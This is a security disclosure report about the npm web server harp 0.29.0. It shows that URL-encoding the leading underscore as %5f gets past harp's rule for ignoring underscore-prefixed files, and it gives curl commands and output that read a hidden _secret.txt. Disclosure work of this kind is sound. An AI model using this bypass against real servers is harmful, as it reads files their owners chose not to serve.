I would like to report an information disclosure through file access in harp.
It allows access to files that are supposed to be ignored according to the harp server rules.

module name: harp
version: 0.29.0
npm page: https://www.npmjs.com/package/harp
zero-configuration web server with built in pre-processing
3,576 downloads in the last week
> #### Ignore those which start with underscore.
Any files or directories that begin with underscore will be ignored by the server. This is the recommended naming convention for layout and partial files. Harp will honour this rule for both files and directories.
> #### Design Rationale
By having a simple convention, it is easy to specify and identify which assets will not be served to the end user.
> #### Example
```
myapp.harp.io/
  +- public/
     |- index.html            <-- will be served
     |- _some-partial.jade    <-- won't be served
     +- _shared-partials/     <-- won't be served
        +- nav.jade
```
This rule can be bypassed by URL-encoding the name of the file or directory that has been forbidden.

Install and start the server:

```
yarn global add harp
harp server
```

Inside the project directory, create a file `_secret.txt`, which according to the rule above should be ignored:

```
echo secret text >> _secret.txt
```

Request it with curl, first with the plain name and then with the underscore percent-encoded (`%5f`):

```
curl --path-as-is 0.0.0.0:9000/_secret.txt
...
<h1>404</h1><h2>Page Not Found</h2>
...
curl --path-as-is 0.0.0.0:9000/%5fsecret.txt
secret text
```
This essentially bypasses the ignore files/folders feature and allows an attacker to read a directory or file that the victim has not allowed access to.